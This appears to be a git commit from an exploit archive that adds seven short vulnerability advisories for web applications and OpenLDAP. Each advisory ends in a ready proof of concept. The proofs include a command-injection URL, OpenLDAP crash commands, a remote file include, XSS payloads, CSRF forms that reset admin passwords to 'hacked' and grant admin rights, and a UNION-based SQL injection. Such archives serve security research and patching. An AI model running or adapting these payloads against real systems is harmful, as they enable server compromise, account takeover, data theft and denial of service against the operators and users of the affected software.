Updated 08_18_2014
This commit is contained in:
Offensive Security
parent
6b6daa5f97
commit
7fc5a86ea9
8 changed files with 87 additions and 0 deletions
|
|
@ -30933,3 +30933,10 @@ id,file,description,date,author,platform,type,port
|
|||
34343,platforms/asp/webapps/34343.txt,"MOJO IWMS 7 'default.asp' Cookie Manipulation Vulnerability",2007-12-17,"cp77fk4r ",asp,webapps,0
|
||||
34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET Multiple SQL Injection Vulnerabilities",2009-12-17,bi0,asp,webapps,0
|
||||
34345,platforms/java/webapps/34345.txt,"jCore 'search' Parameter Cross Site Scripting Vulnerability",2009-12-17,loneferret,java,webapps,0
|
||||
34347,platforms/cgi/webapps/34347.txt,"iOffice 0.1 'parametre' Parameter Remote Command Execution Vulnerability",2010-07-18,"Marshall Whittaker",cgi,webapps,0
|
||||
34348,platforms/linux/dos/34348.txt,"OpenLDAP 2.4.22 'modrdn' Request Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",linux,dos,0
|
||||
34349,platforms/php/webapps/34349.txt,"Yacs CMS 10.5.27 'context[path_to_root]' Parameter Remote File Include Vulnerability",2010-07-18,eidelweiss,php,webapps,0
|
||||
34350,platforms/php/webapps/34350.txt,"Sourcefabric Campsite Articles HTML Injection Vulnerability",2010-07-15,D4rk357,php,webapps,0
|
||||
34351,platforms/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0
|
||||
34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0
|
||||
34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 beta 'uid' Parameter SQL Injection Vulnerability",2010-07-19,"Dinesh Arora",php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
9
platforms/cgi/webapps/34347.txt
Executable file
9
platforms/cgi/webapps/34347.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41768/info
|
||||
|
||||
iOffice is prone to a remote command-execution vulnerability because the software fails to adequately sanitize user-supplied input.
|
||||
|
||||
Successful attacks can compromise the affected software and the underlying server.
|
||||
|
||||
iOffice 0.1 is affected; other versions may also be vulnerable.
|
||||
|
||||
http://www.example.com/cgi-bin/index.pl?section_name=whatever§ion=ioffice¶metre=|id|
|
||||
10
platforms/linux/dos/34348.txt
Executable file
10
platforms/linux/dos/34348.txt
Executable file
|
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/41770/info
|
||||
|
||||
OpenLDAP is prone to multiple vulnerabilities.
|
||||
|
||||
Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application or cause denial-of-service conditions.
|
||||
|
||||
OpenLDAP 2.4.22 is vulnerable; other versions may also be affected.
|
||||
|
||||
ldapmodrdn -x cn=something,dc=anything cn=#80
|
||||
ldapmodrdn -x dc=something,dc=anything dc=
|
||||
9
platforms/php/webapps/34349.txt
Executable file
9
platforms/php/webapps/34349.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41773/info
|
||||
|
||||
Yacs CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
|
||||
|
||||
Yacs CMS 10.5.27 is vulnerable; other versions may be affected.
|
||||
|
||||
http://www.example.com/index.php?context[path_to_root]= [inj3ct0r shell]
|
||||
7
platforms/php/webapps/34350.txt
Executable file
7
platforms/php/webapps/34350.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/41780/info
|
||||
|
||||
Sourcefabric Campsite is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
<marquee><h1>XSS3d By D4rk357</h1><marquee>
|
||||
9
platforms/php/webapps/34351.html
Executable file
9
platforms/php/webapps/34351.html
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41783/info
|
||||
|
||||
BOLDfx eUploader is prone to multiple remote vulnerabilities, including a cross-site request-forgery vulnerability, a security-bypass vulnerability, and an HTML-injection vulnerability.
|
||||
|
||||
Attacker-supplied HTML and script code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user. A remote attacker may also be able to perform certain administrative actions without proper authentication; other attacks are also possible.
|
||||
|
||||
eUploader PRO 3.1.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
<form action="http://www.example.com/admin.php?page=user&id=[ID]" method="post"> <input type="hidden" name="id" value="[ID]"> <input type="hidden" name="admin_access" value="2"> <input type="hidden" name="email" value="my@email.com"> <input type="hidden" name="pass" value="hacked"> <input type="hidden" name="pass2" value="hacked"> <input type="submit" name="edit" value="Submit"> </form>
|
||||
26
platforms/php/webapps/34352.html
Executable file
26
platforms/php/webapps/34352.html
Executable file
|
|
@ -0,0 +1,26 @@
|
|||
source: http://www.securityfocus.com/bid/41787/info
|
||||
|
||||
BOLDfx Recipe Script is prone to multiple remote vulnerabilities, including multiple cross-site request-forgery vulnerabilities, an arbitrary file upload vulnerability, multiple HTML-injection vulnerabilities and multiple cross-site scripting vulnerabilities.
|
||||
|
||||
Attacker-supplied HTML and script code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user. A remote attacker may also be able to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
Recipe Script 5.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/recipes/admin/recipes.php?searchword="[XSS]
|
||||
http://www.example.com/recipes/admin/recipes.php?numitem="[XSS]
|
||||
http://www.example.com/recipes/admin/categories.php?searchword="[XSS]
|
||||
http://www.example.com/recipes/admin/categories.php?numitem="[XSS]
|
||||
http://www.example.com/recipes/admin/all_comments.php?searchword="[XSS]
|
||||
http://www.example.com/recipes/admin/all_comments.php?numitem="[XSS]
|
||||
http://www.example.com/recipes/admin/users.php?searchword="[XSS]
|
||||
http://www.example.com/recipes/admin/users.php?numitem="[XSS]
|
||||
http://www.example.com/recipes/admin/comments.php?searchword="[XSS]
|
||||
http://www.example.com/recipes/admin/comments.php?numitem="[XSS]
|
||||
http://www.example.com/recipes/admin/menus.php?numitem="[XSS]
|
||||
http://www.example.com/recipes/admin/links.php?searchword="[XSS]
|
||||
http://www.example.com/recipes/admin/links.php?numitem="[XSS]
|
||||
http://www.example.com/recipes/admin/banners.php?searchword="[XSS]
|
||||
http://www.example.com/recipes/admin/banners.php?numitem="[XSS]
|
||||
|
||||
|
||||
<form action="http://www.example.com/recipes/update_profile.php" method="POST"> <input name="first_name" type="text" value="DEMO"> <input name="last_name" type="text" value="USER"> <input name="website" type="text" value="website.com"> <input name="country" type="text" value="Moon State"> <input name="email" type="text" value="our@email.com"> <input type="checkbox" name="subscribed" value="1"> <input type="submit" name="Submit" value="Update"> </form> <form action="http://www.example.com/recipes/admin/adminpass.php" method="POST"> <input type="password" name="AdminPass" value="hacked"> <input type="password" name="cAdminPass" value="hacked"> <input type="submit" name="submit" value="Update Password"> </form> <form action="http://www.example.com/recipes/admin/send_email_users.php" method="POST"> <input type="hidden" name="from_email" value="support@site.com"> <input type="hidden" name="subject" value="Subject"> <input type="hidden" name="message" value="Free your mind and the ass will follow!"> <input type="hidden" name="emailtype" value=""> <input type="submit" name="Submit" value="Send"> </form>
|
||||
10
platforms/php/webapps/34353.txt
Executable file
10
platforms/php/webapps/34353.txt
Executable file
|
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/41791/info
|
||||
|
||||
SnowFlake CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
SnowFlake CMS 1.0 beta5.2 is vulnerable.
|
||||
|
||||
|
||||
http://www.example.com/page.php?cid=galleries&uid=1+and+1=2+union+select+1,concat%28version%28%29,0x3a,database%28%29,
|
||||
Loading…
Add table
Reference in a new issue